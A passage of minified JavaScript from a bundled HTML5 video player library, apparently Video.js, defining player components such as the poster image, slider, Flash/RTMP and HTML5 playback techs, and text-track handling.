a.style)},h["default"].registerComponent("Player",V),c["default"]=V,b.exports=c["default"]},{"./big-play-button.js":50,"./component.js":52,"./control-bar/control-bar.js":53,"./error-display.js":82,"./fullscreen-api.js":85,"./global-options.js":86,"./loading-spinner.js":87,"./media-error.js":88,"./poster-image.js":94,"./tech/html5.js":99,"./tech/loader.js":100,"./tracks/text-track-display.js":103,"./tracks/text-track-settings.js":106,"./utils/browser.js":108,"./utils/buffer.js":109,"./utils/dom.js":111,"./utils/events.js":112,"./utils/fn.js":113,"./utils/guid.js":115,"./utils/log.js":116,"./utils/merge-options.js":117,"./utils/time-ranges.js":119,"./utils/to-title-case.js":120,"global/document":1,"global/window":2,"object.assign":44,"safe-json-parse/tuple":49}],93:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("./player.js"),f=d(e),g=function(a,b){f["default"].prototype[a]=b};c["default"]=g,b.exports=c["default"]},{"./player.js":92}],94:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./button.js"),h=d(g),i=a("./component.js"),j=d(i),k=a("./utils/fn.js"),l=d(k),m=a("./utils/dom.js"),n=d(m),o=a("./utils/browser.js"),p=d(o),q=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.update(),c.on("posterchange",l.bind(this,this.update))}return f(b,a),b.prototype.dispose=function(){this.player().off("posterchange",this.update),a.prototype.dispose.call(this)},b.prototype.createEl=function(){var a=n.createEl("div",{className:"vjs-poster",tabIndex:-1});return p.BACKGROUND_SIZE_SUPPORTED||(this.fallbackImg_=n.createEl("img"),a.appendChild(this.fallbackImg_)),a},b.prototype.update=function(){var a=this.player().poster();this.setSrc(a),a?this.show():this.hide()},b.prototype.setSrc=function(a){if(this.fallbackImg_)this.fallbackImg_.src=a;else{var b="";a&&(b='url("'+a+'")'),this.el_.style.backgroundImage=b}},b.prototype.handleClick=function(){this.player_.paused()?this.player_.play():this.player_.pause()},b}(h["default"]);j["default"].registerComponent("PosterImage",q),c["default"]=q,b.exports=c["default"]},{"./button.js":51,"./component.js":52,"./utils/browser.js":108,"./utils/dom.js":111,"./utils/fn.js":113}],95:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("./utils/events.js"),f=d(e),g=a("global/document"),h=d(g),i=a("global/window"),j=d(i),k=!1,l=void 0,m=function(){var a=h["default"].getElementsByTagName("video"),b=h["default"].getElementsByTagName("audio"),c=[];if(a&&a.length>0)for(var d=0,e=a.length;e>d;d++)c.push(a[d]);if(b&&b.length>0)for(var d=0,e=b.length;e>d;d++)c.push(b[d]);if(c&&c.length>0)for(var d=0,e=c.length;e>d;d++){var f=c[d];if(!f||!f.getAttribute){n(1);break}if(void 0===f.player){var g=f.getAttribute("data-setup");if(null!==g){l(f)}}}else k||n(1)},n=function(a,b){l=b,setTimeout(m,a)};"complete"===h["default"].readyState?k=!0:f.one(j["default"],"load",function(){k=!0});var o=function(){return k};c.autoSetup=m,c.autoSetupTimeout=n,c.hasLoaded=o},{"./utils/events.js":112,"global/document":1,"global/window":2}],96:[function(a,b,c){"use 
strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../component.js"),h=d(g),i=a("../utils/dom.js"),j=d(i),k=a("../utils/round-float.js"),l=d(k),m=a("global/document"),n=d(m),o=a("object.assign"),p=d(o),q=function(a){function b(c,d){e(this,b),a.call(this,c,d),this.bar=this.getChild(this.options_.barName),this.handle=this.getChild(this.options_.handleName),this.vertical(!!this.options_.vertical),this.on("mousedown",this.handleMouseDown),this.on("touchstart",this.handleMouseDown),this.on("focus",this.handleFocus),this.on("blur",this.handleBlur),this.on("click",this.handleClick),this.on(c,"controlsvisible",this.update),this.on(c,this.playerEvent,this.update)}return f(b,a),b.prototype.createEl=function(b){var c=void 0===arguments[1]?{}:arguments[1];return c.className=c.className+" vjs-slider",c=p["default"]({role:"slider","aria-valuenow":0,"aria-valuemin":0,"aria-valuemax":100,tabIndex:0},c),a.prototype.createEl.call(this,b,c)},b.prototype.handleMouseDown=function(a){a.preventDefault(),j.blockTextSelection(),this.addClass("vjs-sliding"),this.on(n["default"],"mousemove",this.handleMouseMove),this.on(n["default"],"mouseup",this.handleMouseUp),this.on(n["default"],"touchmove",this.handleMouseMove),this.on(n["default"],"touchend",this.handleMouseUp),this.handleMouseMove(a)},b.prototype.handleMouseMove=function(){},b.prototype.handleMouseUp=function(){j.unblockTextSelection(),this.removeClass("vjs-sliding"),this.off(n["default"],"mousemove",this.handleMouseMove),this.off(n["default"],"mouseup",this.handleMouseUp),this.off(n["default"],"touchmove",this.handleMouseMove),this.off(n["default"],"touchend",this.handleMouseUp),this.update()},b.prototype.update=function(){if(this.el_){var a=this.getPercent(),b=this.bar;if(b){("number"!=typeof a||a!==a||0>a||a===1/0)&&(a=0);var c=l["default"](100*a,2)+"%";this.vertical()?b.el().style.height=c:b.el().style.width=c}}},b.prototype.calculateDistance=function(a){var b=this.el_,c=j.findElPosition(b),d=b.offsetWidth,e=b.offsetHeight,f=this.handle;if(this.options_.vertical){var g=c.top,h=void 0;if(h=a.changedTouches?a.changedTouches[0].pageY:a.pageY,f){var i=f.el().offsetHeight;g+=i/2,e-=i}return Math.max(0,Math.min(1,(g-h+e)/e))}var k=c.left,l=void 0;if(l=a.changedTouches?a.changedTouches[0].pageX:a.pageX,f){var m=f.el().offsetWidth;k+=m/2,d-=m}return Math.max(0,Math.min(1,(l-k)/d))},b.prototype.handleFocus=function(){this.on(n["default"],"keydown",this.handleKeyPress)},b.prototype.handleKeyPress=function(a){37===a.which||40===a.which?(a.preventDefault(),this.stepBack()):(38===a.which||39===a.which)&&(a.preventDefault(),this.stepForward())},b.prototype.handleBlur=function(){this.off(n["default"],"keydown",this.handleKeyPress)},b.prototype.handleClick=function(a){a.stopImmediatePropagation(),a.preventDefault()},b.prototype.vertical=function(a){return void 
0===a?this.vertical_||!1:(this.vertical_=!!a,this.addClass(this.vertical_?"vjs-slider-vertical":"vjs-slider-horizontal"),this)},b}(h["default"]);h["default"].registerComponent("Slider",q),c["default"]=q,b.exports=c["default"]},{"../component.js":52,"../utils/dom.js":111,"../utils/round-float.js":118,"global/document":1,"object.assign":44}],97:[function(a,b,c){"use strict";function d(a){return a.streamingFormats={"rtmp/mp4":"MP4","rtmp/flv":"FLV"},a.streamFromParts=function(a,b){return a+"&"+b},a.streamToParts=function(a){var b={connection:"",stream:""};if(!a)return b;var c=a.indexOf("&"),d=void 0;return-1!==c?d=c+1:(c=d=a.lastIndexOf("/")+1,0===c&&(c=d=a.length)),b.connection=a.substring(0,c),b.stream=a.substring(d,a.length),b},a.isStreamingType=function(b){return b in a.streamingFormats},a.RTMP_RE=/^rtmp[set]?:\/\//i,a.isStreamingSrc=function(b){return a.RTMP_RE.test(b)},a.rtmpSourceHandler={},a.rtmpSourceHandler.canHandleSource=function(b){return a.isStreamingType(b.type)||a.isStreamingSrc(b.src)?"maybe":""},a.rtmpSourceHandler.handleSource=function(b,c){var d=a.streamToParts(b.src);c.setRtmpConnection(d.connection),c.setRtmpStream(d.stream)},a.registerSourceHandler(a.rtmpSourceHandler),a}c.__esModule=!0,c["default"]=d,b.exports=c["default"]},{}],98:[function(a,b,c){"use strict";function d(a){var b=a.charAt(0).toUpperCase()+a.slice(1);z["set"+b]=function(b){return this.el_.vjs_setProperty(a,b)}}function e(a){z[a]=function(){return this.el_.vjs_getProperty(a)}}var f=function(a){return a&&a.__esModule?a:{"default":a}},g=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},h=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;for(var i=a("./tech"),j=f(i),k=a("../utils/dom.js"),l=f(k),m=a("../utils/url.js"),n=f(m),o=a("../utils/time-ranges.js"),p=a("./flash-rtmp"),q=f(p),r=a("../component"),s=f(r),t=a("global/window"),u=f(t),v=a("object.assign"),w=f(v),x=u["default"].navigator,y=function(a){function b(c,d){g(this,b),a.call(this,c,d),c.source&&this.ready(function(){this.setSource(c.source)}),c.startTime&&this.ready(function(){this.load(),this.play(),this.currentTime(c.startTime)}),u["default"].videojs=u["default"].videojs||{},u["default"].videojs.Flash=u["default"].videojs.Flash||{},u["default"].videojs.Flash.onReady=b.onReady,u["default"].videojs.Flash.onEvent=b.onEvent,u["default"].videojs.Flash.onError=b.onError,this.on("seeked",function(){this.lastSeekTarget_=void 0})}return h(b,a),b.prototype.createEl=function(){var a=this.options_,c=a.techId,d=w["default"]({readyFunction:"videojs.Flash.onReady",eventProxyFunction:"videojs.Flash.onEvent",errorEventProxyFunction:"videojs.Flash.onError",autoplay:a.autoplay,preload:a.preload,loop:a.loop,muted:a.muted},a.flashVars),e=w["default"]({wmode:"opaque",bgcolor:"#000000"},a.params),f=w["default"]({id:c,name:c,"class":"vjs-tech"},a.attributes);return this.el_=b.embed(a.swf,d,e,f),this.el_.tech=this,this.el_},b.prototype.play=function(){this.el_.vjs_play()},b.prototype.pause=function(){this.el_.vjs_pause()},b.prototype.src=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){return void 
0===a?this.currentSrc():this.setSrc(a)}),b.prototype.setSrc=function(a){if(a=n.getAbsoluteURL(a),this.el_.vjs_src(a),this.autoplay()){var b=this;this.setTimeout(function(){b.play()},0)}},b.prototype.seeking=function(){return void 0!==this.lastSeekTarget_},b.prototype.setCurrentTime=function(b){var c=this.seekable();c.length&&(b=b>c.start(0)?b:c.start(0),b=b<c.end(c.length-1)?b:c.end(c.length-1),this.lastSeekTarget_=b,this.trigger("seeking"),this.el_.vjs_setProperty("currentTime",b),a.prototype.setCurrentTime.call(this))},b.prototype.currentTime=function(){return this.seeking()?this.lastSeekTarget_||0:this.el_.vjs_getProperty("currentTime")},b.prototype.currentSrc=function(){return this.currentSource_?this.currentSource_.src:this.el_.vjs_getProperty("currentSrc")},b.prototype.load=function(){this.el_.vjs_load()},b.prototype.poster=function(){this.el_.vjs_getProperty("poster")},b.prototype.setPoster=function(){},b.prototype.seekable=function(){var a=this.duration();return 0===a?o.createTimeRange():o.createTimeRange(0,a)},b.prototype.buffered=function(){return o.createTimeRange(0,this.el_.vjs_getProperty("buffered"))},b.prototype.supportsFullScreen=function(){return!1},b.prototype.enterFullScreen=function(){return!1},b}(j["default"]),z=y.prototype,A="rtmpConnection,rtmpStream,preload,defaultPlaybackRate,playbackRate,autoplay,loop,mediaGroup,controller,controls,volume,muted,defaultMuted".split(","),B="error,networkState,readyState,initialTime,duration,startOffsetTime,paused,ended,videoTracks,audioTracks,videoWidth,videoHeight".split(","),C=0;C<A.length;C++)e(A[C]),d(A[C]);for(var C=0;C<B.length;C++)e(B[C]);y.isSupported=function(){return y.version()[0]>=10},j["default"].withSourceHandlers(y),y.nativeSourceHandler={},y.nativeSourceHandler.canHandleSource=function(a){function b(a){var b=n.getFileExtension(a);return b?"video/"+b:""}var c;return c=a.type?a.type.replace(/;.*/,"").toLowerCase():b(a.src),c in y.formats?"maybe":""},y.nativeSourceHandler.handleSource=function(a,b){b.setSrc(a.src)},y.nativeSourceHandler.dispose=function(){},y.registerSourceHandler(y.nativeSourceHandler),y.formats={"video/flv":"FLV","video/x-flv":"FLV","video/mp4":"MP4","video/m4v":"MP4"},y.onReady=function(a){var b=l.getEl(a),c=b&&b.tech;c&&c.el()&&y.checkReady(c)},y.checkReady=function(a){a.el()&&(a.el().vjs_getProperty?a.triggerReady():this.setTimeout(function(){y.checkReady(a)},50))},y.onEvent=function(a,b){var c=l.getEl(a).tech;c.trigger(b)},y.onError=function(a,b){var c=l.getEl(a).tech,d="FLASH: "+b;"srcnotfound"===b?c.trigger("error",{code:4,message:d}):c.trigger("error",d)},y.version=function(){var a="0,0,0";try{a=new u["default"].ActiveXObject("ShockwaveFlash.ShockwaveFlash").GetVariable("$version").replace(/\D+/g,",").match(/^,?(.+),?$/)[1]}catch(b){try{x.mimeTypes["application/x-shockwave-flash"].enabledPlugin&&(a=(x.plugins["Shockwave Flash 2.0"]||x.plugins["Shockwave Flash"]).description.replace(/\D+/g,",").match(/^,?(.+),?$/)[1])}catch(c){}}return a.split(",")},y.embed=function(a,b,c,d){var e=y.getEmbedCode(a,b,c,d),f=l.createEl("div",{innerHTML:e}).childNodes[0];return f},y.getEmbedCode=function(a,b,c,d){var e='<object type="application/x-shockwave-flash" ',f="",g="",h="";return b&&Object.getOwnPropertyNames(b).forEach(function(a){f+=""+a+"="+b[a]+"&"}),c=w["default"]({movie:a,flashvars:f,allowScriptAccess:"always",allowNetworking:"all"},c),Object.getOwnPropertyNames(c).forEach(function(a){g+='<param name="'+a+'" value="'+c[a]+'" 
/>'}),d=w["default"]({data:a,width:"100%",height:"100%"},d),Object.getOwnPropertyNames(d).forEach(function(a){h+=""+a+'="'+d[a]+'" '}),""+e+h+">"+g+"</object>"},q["default"](y),s["default"].registerComponent("Flash",y),c["default"]=y,b.exports=c["default"]},{"../component":52,"../utils/dom.js":111,"../utils/time-ranges.js":119,"../utils/url.js":121,"./flash-rtmp":97,"./tech":101,"global/window":2,"object.assign":44}],99:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("./tech.js"),h=d(g),i=a("../component"),j=d(i),k=a("../utils/dom.js"),l=d(k),m=a("../utils/url.js"),n=d(m),o=a("../utils/fn.js"),p=d(o),q=a("../utils/log.js"),r=d(q),s=a("../utils/browser.js"),t=d(s),u=a("global/document"),v=d(u),w=a("global/window"),x=d(w),y=a("object.assign"),z=d(y),A=a("../utils/merge-options.js"),B=d(A),C=function(a){function b(c,d){e(this,b),a.call(this,c,d);var f=c.source;if(f&&(this.el_.currentSrc!==f.src||c.tag&&3===c.tag.initNetworkState_)&&this.setSource(f),this.el_.hasChildNodes()){for(var g=this.el_.childNodes,h=g.length,i=[];h--;){var j=g[h],k=j.nodeName.toLowerCase();"track"===k&&(this.featuresNativeTextTracks?this.remoteTextTracks().addTrack_(j.track):i.push(j))}for(var l=0;l<i.length;l++)this.el_.removeChild(i[l])}this.featuresNativeTextTracks&&this.on("loadstart",p.bind(this,this.hideCaptions)),t.TOUCH_ENABLED&&c.nativeControlsForTouch===!0&&this.trigger("usenativecontrols"),this.triggerReady()}return f(b,a),b.prototype.dispose=function(){b.disposeMediaElement(this.el_),a.prototype.dispose.call(this)},b.prototype.createEl=function(){var a=this.options_.tag;if(!a||this.movingMediaElementInDOM===!1){if(a){var c=a.cloneNode(!1);a.parentNode.insertBefore(c,a),b.disposeMediaElement(a),a=c}else{a=v["default"].createElement("video");var d=this.options_.tag&&l.getElAttributes(this.options_.tag),e=B["default"]({},d);t.TOUCH_ENABLED&&this.options_.nativeControlsForTouch===!0||delete e.controls,l.setElAttributes(a,z["default"](e,{id:this.options_.techId,"class":"vjs-tech"}))}if(this.options_.tracks)for(var f=0;f<this.options_.tracks.length;f++){var g=this.options_.tracks[f],h=v["default"].createElement("track");h.kind=g.kind,h.label=g.label,h.srclang=g.srclang,h.src=g.src,"default"in g&&h.setAttribute("default","default"),a.appendChild(h)}}for(var i=["autoplay","preload","loop","muted"],f=i.length-1;f>=0;f--){var j=i[f],k={};"undefined"!=typeof this.options_[j]&&(k[j]=this.options_[j]),l.setElAttributes(a,k)}return a},b.prototype.hideCaptions=function(){for(var a=this.el_.querySelectorAll("track"),b=a.length,c={captions:1,subtitles:1};b--;){var d=a[b].track;d&&d.kind in c&&!a[b]["default"]&&(d.mode="disabled")}},b.prototype.play=function(){this.el_.play()},b.prototype.pause=function(){this.el_.pause()},b.prototype.paused=function(){return this.el_.paused},b.prototype.currentTime=function(){return this.el_.currentTime},b.prototype.setCurrentTime=function(a){try{this.el_.currentTime=a}catch(b){r["default"](b,"Video is not ready. 
(Video.js)")}},b.prototype.duration=function(){return this.el_.duration||0},b.prototype.buffered=function(){return this.el_.buffered},b.prototype.volume=function(){return this.el_.volume},b.prototype.setVolume=function(a){this.el_.volume=a},b.prototype.muted=function(){return this.el_.muted},b.prototype.setMuted=function(a){this.el_.muted=a},b.prototype.width=function(){return this.el_.offsetWidth},b.prototype.height=function(){return this.el_.offsetHeight},b.prototype.supportsFullScreen=function(){if("function"==typeof this.el_.webkitEnterFullScreen){var a=x["default"].navigator.userAgent;if(/Android/.test(a)||!/Chrome|Mac OS X 10.5/.test(a))return!0}return!1},b.prototype.enterFullScreen=function(){var a=this.el_;"webkitDisplayingFullscreen"in a&&this.one("webkitbeginfullscreen",function(){this.one("webkitendfullscreen",function(){this.trigger("fullscreenchange",{isFullscreen:!1})}),this.trigger("fullscreenchange",{isFullscreen:!0})}),a.paused&&a.networkState<=a.HAVE_METADATA?(this.el_.play(),this.setTimeout(function(){a.pause(),a.webkitEnterFullScreen()},0)):a.webkitEnterFullScreen()},b.prototype.exitFullScreen=function(){this.el_.webkitExitFullScreen()},b.prototype.src=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){return void 0===a?this.el_.src:void this.setSrc(a)}),b.prototype.setSrc=function(a){this.el_.src=a},b.prototype.load=function(){this.el_.load()},b.prototype.currentSrc=function(){return this.el_.currentSrc},b.prototype.poster=function(){return this.el_.poster},b.prototype.setPoster=function(a){this.el_.poster=a},b.prototype.preload=function(){return this.el_.preload},b.prototype.setPreload=function(a){this.el_.preload=a},b.prototype.autoplay=function(){return this.el_.autoplay},b.prototype.setAutoplay=function(a){this.el_.autoplay=a},b.prototype.controls=function(){return this.el_.controls},b.prototype.setControls=function(a){this.el_.controls=!!a},b.prototype.loop=function(){return this.el_.loop},b.prototype.setLoop=function(a){this.el_.loop=a},b.prototype.error=function(){return this.el_.error},b.prototype.seeking=function(){return this.el_.seeking},b.prototype.seekable=function(){return this.el_.seekable},b.prototype.ended=function(){return this.el_.ended},b.prototype.defaultMuted=function(){
return this.el_.defaultMuted},b.prototype.playbackRate=function(){return this.el_.playbackRate},b.prototype.played=function(){return this.el_.played},b.prototype.setPlaybackRate=function(a){this.el_.playbackRate=a},b.prototype.networkState=function(){return this.el_.networkState},b.prototype.readyState=function(){return this.el_.readyState},b.prototype.videoWidth=function(){return this.el_.videoWidth},b.prototype.videoHeight=function(){return this.el_.videoHeight},b.prototype.textTracks=function(){return this.featuresNativeTextTracks?this.el_.textTracks:a.prototype.textTracks.call(this)},b.prototype.addTextTrack=function(b,c,d){return this.featuresNativeTextTracks?this.el_.addTextTrack(b,c,d):a.prototype.addTextTrack.call(this,b,c,d)},b.prototype.addRemoteTextTrack=function(){var b=void 0===arguments[0]?{}:arguments[0];if(!this.featuresNativeTextTracks)return a.prototype.addRemoteTextTrack.call(this,b);var c=v["default"].createElement("track");return b.kind&&(c.kind=b.kind),b.label&&(c.label=b.label),(b.language||b.srclang)&&(c.srclang=b.language||b.srclang),b["default"]&&(c["default"]=b["default"]),b.id&&(c.id=b.id),b.src&&(c.src=b.src),this.el().appendChild(c),c.track.mode="metadata"===c.track.kind?"hidden":"disabled",c.onload=function(){var a=c.track;c.readyState>=2&&("metadata"===a.kind&&"hidden"!==a.mode?a.mode="hidden":"metadata"!==a.kind&&"disabled"!==a.mode&&(a.mode="disabled"),c.onload=null)},this.remoteTextTracks().addTrack_(c.track),c},b.prototype.removeRemoteTextTrack=function(b){if(!this.featuresNativeTextTracks)return a.prototype.removeRemoteTextTrack.call(this,b);var c,d;for(this.remoteTextTracks().removeTrack_(b),c=this.el().querySelectorAll("track"),d=0;d<c.length;d++)if(c[d]===b||c[d].track===b){c[d].parentNode.removeChild(c[d]);break}},b}(h["default"]);C.TEST_VID=v["default"].createElement("video");var D=v["default"].createElement("track");D.kind="captions",D.srclang="en",D.label="English",C.TEST_VID.appendChild(D),C.isSupported=function(){try{C.TEST_VID.volume=.5}catch(a){return!1}return!!C.TEST_VID.canPlayType},h["default"].withSourceHandlers(C),C.nativeSourceHandler={},C.nativeSourceHandler.canHandleSource=function(a){function b(a){try{return C.TEST_VID.canPlayType(a)}catch(b){return""}}var c;return a.type?b(a.type):a.src?(c=n.getFileExtension(a.src),b("video/"+c)):""},C.nativeSourceHandler.handleSource=function(a,b){b.setSrc(a.src)},C.nativeSourceHandler.dispose=function(){},C.registerSourceHandler(C.nativeSourceHandler),C.canControlVolume=function(){var a=C.TEST_VID.volume;return C.TEST_VID.volume=a/2+.1,a!==C.TEST_VID.volume},C.canControlPlaybackRate=function(){var a=C.TEST_VID.playbackRate;return C.TEST_VID.playbackRate=a/2+.1,a!==C.TEST_VID.playbackRate},C.supportsNativeTextTracks=function(){var a;return a=!!C.TEST_VID.textTracks,a&&C.TEST_VID.textTracks.length>0&&(a="number"!=typeof C.TEST_VID.textTracks[0].mode),a&&t.IS_FIREFOX&&(a=!1),a},C.prototype.featuresVolumeControl=C.canControlVolume(),C.prototype.featuresPlaybackRate=C.canControlPlaybackRate(),C.prototype.movingMediaElementInDOM=!t.IS_IOS,C.prototype.featuresFullscreenResize=!0,C.prototype.featuresProgressEvents=!0,C.prototype.featuresNativeTextTracks=C.supportsNativeTextTracks();var E=void 0,F=/^application\/(?:x-|vnd\.apple\.)mpegurl/i,G=/^video\/mp4/i;C.patchCanPlayType=function(){t.ANDROID_VERSION>=4&&(E||(E=C.TEST_VID.constructor.prototype.canPlayType),C.TEST_VID.constructor.prototype.canPlayType=function(a){return 
a&&F.test(a)?"maybe":E.call(this,a)}),t.IS_OLD_ANDROID&&(E||(E=C.TEST_VID.constructor.prototype.canPlayType),C.TEST_VID.constructor.prototype.canPlayType=function(a){return a&&G.test(a)?"maybe":E.call(this,a)})},C.unpatchCanPlayType=function(){var a=C.TEST_VID.constructor.prototype.canPlayType;return C.TEST_VID.constructor.prototype.canPlayType=E,E=null,a},C.patchCanPlayType(),C.disposeMediaElement=function(a){if(a){for(a.parentNode&&a.parentNode.removeChild(a);a.hasChildNodes();)a.removeChild(a.firstChild);a.removeAttribute("src"),"function"==typeof a.load&&!function(){try{a.load()}catch(b){}}()}},j["default"].registerComponent("Html5",C),c["default"]=C,b.exports=c["default"]},{"../component":52,"../utils/browser.js":108,"../utils/dom.js":111,"../utils/fn.js":113,"../utils/log.js":116,"../utils/merge-options.js":117,"../utils/url.js":121,"./tech.js":101,"global/document":1,"global/window":2,"object.assign":44}],100:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../component"),h=d(g),i=a("global/window"),j=(d(i),a("../utils/to-title-case.js")),k=d(j),l=function(a){function b(c,d,f){if(e(this,b),a.call(this,c,d,f),d.playerOptions.sources&&0!==d.playerOptions.sources.length)c.src(d.playerOptions.sources);else for(var g=0,i=d.playerOptions.techOrder;g<i.length;g++){var j=k["default"](i[g]),l=h["default"].getComponent(j);if(l&&l.isSupported()){c.loadTech(j);break}}}return f(b,a),b}(h["default"]);h["default"].registerComponent("MediaLoader",l),c["default"]=l,b.exports=c["default"]},{"../component":52,"../utils/to-title-case.js":120,"global/window":2}],101:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../component"),h=d(g),i=a("../tracks/text-track"),j=d(i),k=a("../tracks/text-track-list"),l=d(k),m=a("../utils/fn.js"),n=d(m),o=a("../utils/log.js"),p=d(o),q=a("../utils/time-ranges.js"),r=a("../utils/buffer.js"),s=a("global/window"),t=d(s),u=a("global/document"),v=d(u),w=function(a){function b(){var c=void 0===arguments[0]?{}:arguments[0],d=void 0===arguments[1]?function(){}:arguments[1];e(this,b),c.reportTouchActivity=!1,a.call(this,null,c,d),this.hasStarted_=!1,this.on("playing",function(){this.hasStarted_=!0}),this.on("loadstart",function(){this.hasStarted_=!1}),this.textTracks_=c.textTracks,this.featuresProgressEvents||this.manualProgressOn(),this.featuresTimeupdateEvents||this.manualTimeUpdatesOn(),this.initControlsListeners(),(c.nativeCaptions===!1||c.nativeTextTracks===!1)&&(this.featuresNativeTextTracks=!1),this.featuresNativeTextTracks||this.emulateTextTracks(),this.initTextTrackListeners(),this.emitTapEvents()}/*! Time Tracking -------------------------------------------------------------- */
return f(b,a),b.prototype.initControlsListeners=function(){this.ready(function(){this.networkState&&this.networkState()>0&&this.trigger("loadstart")})},b.prototype.manualProgressOn=function(){this.on("durationchange",this.onDurationChange),this.manualProgress=!0,this.one("ready",this.trackProgress)},b.prototype.manualProgressOff=function(){this.manualProgress=!1,this.stopTrackingProgress(),this.off("durationchange",this.onDurationChange)},b.prototype.trackProgress=function(){this.stopTrackingProgress(),this.progressInterval=this.setInterval(n.bind(this,function(){var a=this.bufferedPercent();this.bufferedPercent_!==a&&this.trigger("progress"),this.bufferedPercent_=a,1===a&&this.stopTrackingProgress()}),500)},b.prototype.onDurationChange=function(){this.duration_=this.duration()},b.prototype.buffered=function(){return q.createTimeRange(0,0)},b.prototype.bufferedPercent=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){return r.bufferedPercent(this.buffered(),this.duration_)}),b.prototype.stopTrackingProgress=function(){this.clearInterval(this.progressInterval)},b.prototype.manualTimeUpdatesOn=function(){this.manualTimeUpdates=!0,this.on("play",this.trackCurrentTime),this.on("pause",this.stopTrackingCurrentTime)},b.prototype.manualTimeUpdatesOff=function(){this.manualTimeUpdates=!1,this.stopTrackingCurrentTime(),this.off("play",this.trackCurrentTime),this.off("pause",this.stopTrackingCurrentTime)},b.prototype.trackCurrentTime=function(){this.currentTimeInterval&&this.stopTrackingCurrentTime(),this.currentTimeInterval=this.setInterval(function(){this.trigger({type:"timeupdate",target:this,manuallyTriggered:!0})},250)},b.prototype.stopTrackingCurrentTime=function(){this.clearInterval(this.currentTimeInterval),this.trigger({type:"timeupdate",target:this,manuallyTriggered:!0})},b.prototype.dispose=function(){this.manualProgress&&this.manualProgressOff(),this.manualTimeUpdates&&this.manualTimeUpdatesOff(),a.prototype.dispose.call(this)},b.prototype.played=function(){return this.hasStarted_?q.createTimeRange(0,0):q.createTimeRange()},b.prototype.setCurrentTime=function(){this.manualTimeUpdates&&this.trigger({type:"timeupdate",target:this,manuallyTriggered:!0})},b.prototype.initTextTrackListeners=function(){var a=n.bind(this,function(){this.trigger("texttrackchange")}),b=this.textTracks();b&&(b.addEventListener("removetrack",a),b.addEventListener("addtrack",a),this.on("dispose",n.bind(this,function(){b.removeEventListener("removetrack",a),b.removeEventListener("addtrack",a)})))},b.prototype.emulateTextTracks=function(){if(!t["default"].WebVTT&&null!=this.el().parentNode){var a=v["default"].createElement("script");a.src=this.options_["vtt.js"]||"../node_modules/vtt.js/dist/vtt.js",this.el().parentNode.appendChild(a),t["default"].WebVTT=!0}var b=this.textTracks();if(b){var c=n.bind(this,function(){var a=this,c=function(){return a.trigger("texttrackchange")};c();for(var d=0;d<b.length;d++){var e=b[d];e.removeEventListener("cuechange",c),"showing"===e.mode&&e.addEventListener("cuechange",c)}});b.addEventListener("change",c),this.on("dispose",function(){b.removeEventListener("change",c)})}},b.prototype.textTracks=function(){return this.textTracks_=this.textTracks_||new l["default"],this.textTracks_},b.prototype.remoteTextTracks=function(){return this.remoteTextTracks_=this.remoteTextTracks_||new l["default"],this.remoteTextTracks_},b.prototype.addTextTrack=function(a,b,c){if(!a)throw new Error("TextTrack kind is required but was not 
